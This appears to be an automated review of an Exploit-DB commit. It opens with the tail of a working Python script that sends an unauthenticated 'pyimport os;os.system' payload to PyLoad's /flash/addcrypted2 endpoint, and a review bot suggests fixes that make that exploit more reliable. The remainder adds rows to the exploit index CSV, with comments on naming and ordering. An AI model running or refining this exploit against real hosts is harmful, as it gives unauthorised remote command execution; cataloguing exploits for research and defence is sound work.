except requests.exceptions.RequestException as e:
print("[!] Maybe the host is offline :", e)
exit()
def runExploit(url, cmd):
endpoint = url + '/flash/addcrypted2'
if " " in cmd:
validCommand = cmd.replace(" ", "%20")
else:
validCommand = cmd
payload = 'jk=pyimport%20os;os.system("'+validCommand+'");f=function%20f2(){};&package=xxx&crypted=AAAA&&passwords=aaaa'
test = requests.post(endpoint, headers={'Content-type': 'application/x-www-form-urlencoded'},data=payload)
print('[+] The exploit has be executeded in target machine. ')
def main(targetUrl, Command):
print('[+] Check if target host is alive: ' + targetUrl)
alive = doRequest(targetUrl)
if alive == True:
print("[+] Host up, let's exploit! ")
runExploit(targetUrl,Command)
else:
print('[-] Host down! ')
if(arguments.url != None and arguments.cmd != None):
targetUrl = arguments.url
Command = arguments.cmd
main(targetUrl, Command)
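Review bot: `runExploit` only encodes spaces (`cmd.replace(" ", "%20")`), so any command containing `&`, `+`, `#`, `%` or `"` is mangled: `&` and `+` are consumed by the form decoder, and a `"` terminates the `os.system("...")` string inside the `jk` payload. Build the payload with `urllib.parse.quote(cmd, safe='')` and reject or escape double quotes first; the `if " " in cmd` branch then disappears. The POST result stored in `test` is never inspected, so "[+] The exploit has be executeded" (typo for "has been executed") prints even on a 4xx/5xx; check and print `test.status_code`. Cosmetic: `&&passwords=aaaa` has a doubled ampersand, `exit()` should be `sys.exit()` in a script, and a `-u` value with a trailing slash produces `//flash/addcrypted2`, so strip it with `url.rstrip('/')`.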


@ -3311,6 +3311,9 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
23855,exploits/hardware/remote/23855.txt,"Allied Telesis AT-MCF2000M 3.0.2 - Remote Command Execution",2013-01-03,dun,remote,hardware,,2013-01-03,2016-12-04,0,OSVDB-88921,,,,,
21243,exploits/hardware/remote/21243.pl,"Alteon AceDirector - Half-Closed HTTP Request IP Address Revealing",2001-12-20,"Dave Plonka",remote,hardware,,2001-12-20,2012-09-11,1,CVE-2002-0209;OSVDB-3964,,,,,https://www.securityfocus.com/bid/3964/info
31519,exploits/hardware/remote/31519.rb,"Android Browser and WebView addJavascriptInterface - Code Execution (Metasploit)",2014-02-07,Metasploit,remote,hardware,,2014-02-07,2014-02-07,1,CVE-2013-4710;OSVDB-97520,"Metasploit Framework (MSF)",,,,https://labs.mwrinfosecurity.com/advisories/2013/09/24/webview
51516,exploits/hardware/remote/51516.txt,"Anevia Flamingo XL 3.2.9 - Remote Root Jailbreak",2023-06-14,LiquidWorm,remote,hardware,,2023-06-14,2023-06-14,0,,,,,,
51515,exploits/hardware/remote/51515.txt,"Anevia Flamingo XL 3.6.20 - Authenticated Root Remote Code Execution",2023-06-14,LiquidWorm,remote,hardware,,2023-06-14,2023-06-14,0,,,,,,
51514,exploits/hardware/remote/51514.txt,"Anevia Flamingo XS 3.6.5 - Authenticated Root Remote Code Execution",2023-06-14,LiquidWorm,remote,hardware,,2023-06-14,2023-06-14,0,,,,,,
33044,exploits/hardware/remote/33044.html,"Apple iPhone 2.2.1 - Call Approval Dialog Security Bypass (1)",2009-05-17,"Collin Mulliner",remote,hardware,,2009-05-17,2014-04-27,1,CVE-2009-0961;OSVDB-55238,,,,,https://www.securityfocus.com/bid/35425/info
33045,exploits/hardware/remote/33045.html,"Apple iPhone 2.2.1 - Call Approval Dialog Security Bypass (2)",2009-05-17,"Collin Mulliner",remote,hardware,,2009-05-17,2014-04-27,1,CVE-2009-0961;OSVDB-55238,,,,,https://www.securityfocus.com/bid/35425/info
33046,exploits/hardware/remote/33046.html,"Apple iPhone 2.2.1 - Call Approval Dialog Security Bypass (3)",2009-05-17,"Collin Mulliner",remote,hardware,,2009-05-17,2014-04-27,1,CVE-2009-0961;OSVDB-55238,,,,,https://www.securityfocus.com/bid/35425/info
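Review bot: the three new Anevia rows (51514, 51515, 51516) leave the trailing source URL column empty although each advisory carries a zeroscience URL (`https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5778.php` through `-5780.php`); neighbouring rows populate that column (the securityfocus links on 21243, 33044, 33045, 33046), so add them. Also, 51516's description "Anevia Flamingo XL 3.2.9 - Remote Root Jailbreak" should carry "(Authenticated)" like the other two, since its PoC first logs in over SSH with the root password.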
@ -23467,6 +23470,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
38148,exploits/php/webapps/38148.txt,"Monsta FTP 1.6.2 - Multiple Vulnerabilities",2015-09-11,hyp3rlinx,webapps,php,80,2015-09-11,2015-09-11,0,OSVDB-127474;OSVDB-127473,,,,http://www.exploit-db.comMonsta-FTP-master.zip,
27660,exploits/php/webapps/27660.txt,"Monster Top List 1.4 - 'functions.php' Remote File Inclusion",2006-04-17,r0t,webapps,php,,2006-04-17,2013-08-18,1,CVE-2006-1781;OSVDB-24650,,,,,https://www.securityfocus.com/bid/17546/info
3530,exploits/php/webapps/3530.pl,"Monster Top List 1.4.2 - 'functions.php?root_path' Remote File Inclusion",2007-03-20,fluffy_bunny,webapps,php,,2007-03-19,2016-09-29,1,CVE-2006-1781,,,,,
51519,exploits/php/webapps/51519.txt,"Monstra 3.0.4 - Stored Cross-Site Scripting (XSS)",2023-06-14,tmrswrr,webapps,php,,2023-06-14,2023-06-14,0,,,,,,
38769,exploits/php/webapps/38769.txt,"Monstra CMS 1.2.0 - 'login' SQL Injection",2013-09-20,linc0ln.dll,webapps,php,,2013-09-20,2018-03-01,1,OSVDB-97526,,,,,https://www.securityfocus.com/bid/62572/info
37651,exploits/php/webapps/37651.html,"Monstra CMS 1.2.1 - Multiple HTML Injection Vulnerabilities",2012-08-23,LiquidWorm,webapps,php,,2012-08-23,2018-03-01,1,OSVDB-84839,,,,,https://www.securityfocus.com/bid/55171/info
39567,exploits/php/webapps/39567.txt,"Monstra CMS 3.0.3 - Multiple Vulnerabilities",2016-03-16,"Sarim Kiani",webapps,php,80,2016-03-28,2016-03-28,0,,,,,http://www.exploit-db.commonstra-3.0.3.zip,
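Review bot: the new row 51519 is titled "Monstra 3.0.4 - Stored Cross-Site Scripting (XSS)" while the existing entries use "Monstra CMS" (38769, 37651, 39567), so it sorts before "Monstra CMS 1.2.0" and breaks the product grouping; rename to "Monstra CMS 3.0.4 - Stored Cross-Site Scripting (XSS) (Authenticated)", which also records that the repro needs an admin login, as the Xoops and Textpattern titles in this commit do.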
@ -24760,6 +24764,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
18035,exploits/php/webapps/18035.txt,"Online Subtitles Workshop - Cross-Site Scripting",2011-10-26,M.Jock3R,webapps,php,,2011-10-26,2011-12-21,0,OSVDB-76573;CVE-2011-5185,,,,,
43994,exploits/php/webapps/43994.txt,"Online Test Script 2.0.7 - 'cid' SQL Injection",2018-02-07,L0RD,webapps,php,80,2018-02-07,2018-02-07,1,,"SQL Injection (SQLi)",,,,
50597,exploits/php/webapps/50597.txt,"Online Thesis Archiving System 1.0 - SQLi Authentication Bypass",2021-12-14,"Yehia Elghaly",webapps,php,,2021-12-14,2021-12-14,0,,,,,,
51521,exploits/php/webapps/51521.txt,"Online Thesis Archiving System v1.0 - Multiple-SQLi",2023-06-14,nu11secur1ty,webapps,php,,2023-06-14,2023-06-14,0,,,,,,
49277,exploits/php/webapps/49277.txt,"Online Tours & Travels Management System 1.0 - _id_ SQL Injection",2020-12-17,"Saeed Bala Ahmed",webapps,php,,2020-12-17,2020-12-17,0,,,,,,
44977,exploits/php/webapps/44977.txt,"Online Trade - Information Disclosure",2018-07-04,L0RD,webapps,php,,2018-07-04,2018-07-04,0,CVE-2018-12908,,,,,
50218,exploits/php/webapps/50218.txt,"Online Traffic Offense Management System 1.0 - 'id' SQL Injection (Authenticated)",2021-08-20,"Justin White",webapps,php,,2021-08-20,2021-08-20,0,,,,,,
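Review bot: row 51521 uses "v1.0" and "Multiple-SQLi" while the existing row 50597 for the same product uses "1.0" and names the issue ("SQLi Authentication Bypass"); align the version string to "1.0" and name the injected parameter in the style of 43994 and 50218 in this block ("'password' SQL Injection") so the two entries can be told apart in search.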
@ -28102,8 +28107,10 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
31229,exploits/php/webapps/31229.txt,"ProjectPier 0.8 - Multiple HTML Injection / Cross-Site Scripting Vulnerabilities",2008-02-18,L4teral,webapps,php,,2008-02-18,2014-01-28,1,CVE-2008-5584;OSVDB-42376,,,,,https://www.securityfocus.com/bid/27857/info
35424,exploits/php/webapps/35424.py,"ProjectSend r-561 - Arbitrary File Upload",2014-12-02,"Fady Mohammed Osman",webapps,php,,2014-12-16,2014-12-16,0,OSVDB-116469;CVE-2014-9567,,,,http://www.exploit-db.comProjectSend-r561.zip,
50240,exploits/php/webapps/50240.txt,"Projectsend r1295 - 'name' Stored XSS",2021-08-30,"Abdullah Kala",webapps,php,,2021-08-30,2021-08-30,0,,,,,,
51517,exploits/php/webapps/51517.txt,"projectSend r1605 - CSV injection",2023-06-14,"Mirabbas Ağalarov",webapps,php,,2023-06-14,2023-06-14,0,,,,,,
51400,exploits/php/webapps/51400.txt,"projectSend r1605 - Private file download",2023-05-02,"Mirabbas Ağalarov",webapps,php,,2023-05-02,2023-05-02,0,,,,,,
51238,exploits/php/webapps/51238.txt,"projectSend r1605 - Remote Code Exectution RCE",2023-04-05,"Mirabbas Ağalarov",webapps,php,,2023-04-05,2023-04-05,0,,,,,,
51518,exploits/php/webapps/51518.txt,"projectSend r1605 - Stored XSS",2023-06-14,"Mirabbas Ağalarov",webapps,php,,2023-06-14,2023-06-14,0,,,,,,
35582,exploits/php/webapps/35582.txt,"ProjectSend r561 - Multiple Vulnerabilities",2014-12-19,TaurusOmar,webapps,php,80,2014-12-19,2014-12-27,0,CVE-2014-1155;CVE-2011-3713;CVE-2014-9580,,,,http://www.exploit-db.comProjectSend-r561.zip,
36303,exploits/php/webapps/36303.txt,"ProjectSend r561 - SQL Injection",2015-03-06,"ITAS Team",webapps,php,80,2015-03-06,2015-03-06,0,OSVDB-119169;CVE-2015-2564,,,,http://www.exploit-db.comProjectSend-r561.zip,
39588,exploits/php/webapps/39588.txt,"ProjectSend r582 - Multiple Cross-Site Scripting Vulnerabilities",2016-03-21,"Michael Helwig",webapps,php,80,2016-03-21,2016-03-21,0,,,,,http://www.exploit-db.comProjectSend-r582.zip,
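Review bot: both new rows (51517 CSV injection, 51518 Stored XSS) have an empty tags column, and the Stored XSS description does not name the affected field, unlike the earlier 50240 entry ("'name' Stored XSS"); if the advisory identifies the parameter, add it to the description so the r1605 rows can be told apart. The adjacent unchanged 51238 row spells "Exectution", which could be fixed in the same pass.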
@ -30490,6 +30497,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
49975,exploits/php/webapps/49975.txt,"TextPattern CMS 4.8.7 - Stored Cross-Site Scripting (XSS)",2021-06-10,"Mert Daş",webapps,php,,2021-06-10,2021-06-10,0,,,,,http://www.exploit-db.comtextpattern-4.8.7.zip,
49617,exploits/php/webapps/49617.txt,"Textpattern CMS 4.9.0-dev - 'Excerpt' Persistent Cross-Site Scripting (XSS)",2021-03-04,"Tushar Vaidya",webapps,php,,2021-03-04,2021-03-04,0,,,,,,
50095,exploits/php/webapps/50095.py,"TextPattern CMS 4.9.0-dev - Remote Command Execution (RCE) (Authenticated)",2021-07-05,"Mevlüt Akçam",webapps,php,,2021-07-05,2021-07-05,0,,,,,,
51523,exploits/php/webapps/51523.txt,"Textpattern CMS v4.8.8 - Stored Cross-Site Scripting (XSS) (Authenticated)",2023-06-14,tmrswrr,webapps,php,,2023-06-14,2023-06-14,0,,,,,,
2965,exploits/php/webapps/2965.txt,"TextSend 1.5 - '/config/sender.php' Remote File Inclusion",2006-12-20,nuffsaid,webapps,php,,2006-12-19,,1,OSVDB-32381;CVE-2006-6686,,,,,
25997,exploits/php/webapps/25997.txt,"tForum b0.9 - 'member.php' Cross-Site Scripting",2005-07-18,wannacut,webapps,php,,2005-07-18,2013-06-07,1,,,,,,https://www.securityfocus.com/bid/14303/info
1611,exploits/php/webapps/1611.pl,"TFT Gallery 0.10 - Password Disclosure",2006-03-25,undefined1_,webapps,php,,2006-03-24,2016-06-30,1,OSVDB-24164;CVE-2006-1412,,,,http://www.exploit-db.comtftgallery-0.10.zip,
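Review bot: the new 51523 description uses "Textpattern CMS v4.8.8" while the surrounding rows write the version without a "v" ("TextPattern CMS 4.8.7", "Textpattern CMS 4.9.0-dev"); the prefix also places the 4.8.8 entry after the 4.9.0-dev rows in this alphabetically ordered block, so drop the "v" to keep the ordering consistent.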
@ -33991,6 +33999,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
43827,exploits/php/webapps/43827.txt,"XOOPS < 2.0.11 - Multiple Vulnerabilities",2015-06-29,"GulfTech Security",webapps,php,,2018-01-19,2018-01-19,0,GTSA-00079;CVE-2005-2112;CVE-2005-2113,,,,,http://gulftech.org/advisories/XOOPS%20Multiple%20Vulnerabilities/79
9249,exploits/php/webapps/9249.txt,"XOOPS Celepar Module Qas - 'codigo' SQL Injection",2009-07-24,s4r4d0,webapps,php,,2009-07-23,,1,OSVDB-56598;CVE-2009-4714;OSVDB-56597;CVE-2009-4713;OSVDB-56596;OSVDB-56595;CVE-2009-4698;OSVDB-56594;OSVDB-56593,,,,,
9261,exploits/php/webapps/9261.txt,"XOOPS Celepar Module Qas - Blind SQL Injection / Cross-Site Scripting",2009-07-27,Moudi,webapps,php,,2009-07-26,2016-10-27,1,CVE-2009-4698;OSVDB-56595;OSVDB-56594;OSVDB-56593,,,,,
51520,exploits/php/webapps/51520.txt,"Xoops CMS 2.5.10 - Stored Cross-Site Scripting (XSS) (Authenticated)",2023-06-14,tmrswrr,webapps,php,,2023-06-14,2023-06-14,0,,,,,,
37376,exploits/php/webapps/37376.php,"XOOPS Cube PROJECT FileManager - 'xupload.php' Arbitrary File Upload",2012-06-12,KedAns-Dz,webapps,php,,2012-06-12,2015-06-26,1,,,,,,https://www.securityfocus.com/bid/53945/info
3849,exploits/php/webapps/3849.txt,"XOOPS Flashgames Module 1.0.1 - SQL Injection",2007-05-04,"Mehmet Ince",webapps,php,,2007-05-03,,1,OSVDB-34472;CVE-2007-2543,,,,,
39188,exploits/php/webapps/39188.txt,"XOOPS Glossaire Module - '/modules/glossaire/glossaire-aff.php' SQL Injection",2014-05-19,AtT4CKxT3rR0r1ST,webapps,php,,2014-05-19,2016-01-07,1,CVE-2014-3935;OSVDB-107104,,,,,https://www.securityfocus.com/bid/67460/info
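Review bot: the new 51520 row writes the product as "Xoops CMS" whereas every neighbouring entry uses "XOOPS"; align the capitalization so searches on the product name return this row together with the rest of the XOOPS entries.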
@ -34516,6 +34525,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
48727,exploits/python/webapps/48727.py,"Pi-hole 4.3.2 - Remote Code Execution (Authenticated)",2020-08-04,"Luis Vacacas",webapps,python,,2020-08-04,2020-08-04,0,CVE-2020-8816,,,,,
38738,exploits/python/webapps/38738.txt,"Plone - 'in_portal.py' < 4.1.3 Session Hijacking",2013-07-31,"Cyrill Bannwart",webapps,python,,2013-07-31,2015-11-17,1,CVE-2013-4200;OSVDB-95863,,,,,https://www.securityfocus.com/bid/61964/info
49930,exploits/python/webapps/49930.txt,"Products.PluggableAuthService 2.6.0 - Open Redirect",2021-06-02,"Piyush Patil",webapps,python,,2021-06-02,2021-06-02,0,CVE-2021-21337,,,,http://www.exploit-db.comProducts.PluggableAuthService-2.6.0.zip,
51522,exploits/python/webapps/51522.py,"PyLoad 0.5.0 - Pre-auth Remote Code Execution (RCE)",2023-06-14,"Gabriel Lima",webapps,python,,2023-06-14,2023-06-14,0,CVE-2023-0297,,,,,
39199,exploits/python/webapps/39199.html,"Pyplate - 'addScript.py' Cross-Site Request Forgery",2014-05-23,"Henri Salo",webapps,python,,2014-05-23,2016-01-08,1,CVE-2014-3854;OSVDB-107099,,,,,https://www.securityfocus.com/bid/67610/info
51226,exploits/python/webapps/51226.txt,"Roxy WI v6.1.0.0 - Improper Authentication Control",2023-04-03,"Nuri Çilengir",webapps,python,,2023-04-03,2023-05-24,1,CVE-2022-31125,,,,,
51227,exploits/python/webapps/51227.txt,"Roxy WI v6.1.0.0 - Unauthenticated Remote Code Execution (RCE)",2023-04-03,"Nuri Çilengir",webapps,python,,2023-04-03,2023-06-04,1,CVE-2022-31126,,,,,
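Review bot: the new 51522 description uses "Pre-auth" while the neighbouring 51227 row expresses the same property as "Unauthenticated Remote Code Execution (RCE)"; prefer the established wording so the two unauthenticated RCE entries in this block read alike.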
